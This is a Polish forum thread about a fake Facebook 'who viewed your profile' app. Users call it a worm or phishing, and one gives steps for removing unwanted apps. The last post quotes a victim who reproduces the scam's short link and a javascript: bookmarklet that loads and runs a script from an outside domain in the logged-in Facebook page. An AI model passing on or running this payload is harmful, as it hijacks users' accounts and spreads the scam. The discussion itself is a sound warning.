Kto i ile razy podgląda was na Facebook - problem

Witam, ostatnio na facebook-u pojawił się program typu "See who views your profile " czyli robisz coś i widzisz kto ile razy podglądał i ile razy ty kogoś. Mam pytanie na czym to polega czy da radę jakoś wyzerować licznik? Nie chce by kilka pewnych osób widziało to ile razy u nich siedze… Chora akcja myślałem, że fb jest poważniejszy.

To jest w porządku. Co byś zrobił, jeśli okazałoby się, że wytropiłeś tak mordercę? Jeśli nie masz nic na sumieniu, to raczej nie masz nic do ukrycia.

Z ciekawości zrobiłem 4 razy sprawdzenie ile razy wchodzono na mój profil i za każdym razem był inny wynik. Aplikacje, z których korzystałem wymuszały tylko rejestracje na innych stronach.

Jak dla mnie to blef, chyba że trafiałem na złe aplikacje.

to jest jeden wielki świerzy robak, daje losowe wyniki, rozsyła się poprzez facebook chat, i sam zaprasza do wzięcia udziału w akcji… who viewed …

phishing jak nic, a to że pogldądałeś koleżanke z gimnazjum nie wyjdzie na jaw…

PS:

Polecam szybko pousuwać uprawnienia nadane tej aplikacji.

Ja powiem tak. Jakby coś takiego było możliwe to facebook sam by to oferował, a nie jakieś pseudo-aplikacje. I tyle.

a jak można zablokować ta “aplikację?”

no właśnie chodzi o te “jakoś” :wink:

http://see-profile.appspot.com/?77582

nic, na pewno wymyślą jak tego się pozbyć :slight_smile:

Ale dzięki za chęci :wink:

Jak usunąć niechcianą aplikację na FB

Klikasz w górnym prawym rogu na Konto => Ustawienia Prywatności potem na dole masz “Aplikacje i witryny” klikasz na “Edytuj ustawienia”, następnie “Usuń niechciane aplikacje lub aplikacje wysyłające spam” i tam usuwasz niechciane aplikację w tym także te.

Wow, ludzie faktycznie korzystają z tego facebooka nie zwracając uwagi na żadną ochrone danych, klikają w aplikacje które pobierają wszystko, a nawet potem nie wiedzą jak to zablokować, nie dziwie się że facebook jest aktualnie tyle warty :smiley:

Nawet Google nie stać by go odkupić ;p

Stać stać, ale kto by chciał sprzedawać tak dobrze prosperującą marke? :wink:

Co do tej aplikacji to jest jedną z wielu które mogą nawet namieszać nam w kompie.

Cytuję:

Witam,

niestety dałam się złapać, ok możecie pisać o ludzkiej głupocie itd. W tym akurat wypadku nie mam prawa się obrażać :wink:

ale napiszcie proszę jak się tego paskudztwa pozbyć!

chodzi o stronę ow.ly/4Jx7w

i skrypt: javascript:(a=(b=document).createElement(‘script’)).src=’//twojtest.pl/1.js?’+Math.random(),b.body.appendChild(a);void(0)

nie znam się na tym i naprawdę bardzo proszę o pomoc i konkretne odpowiedzi.

Pozdrawiam.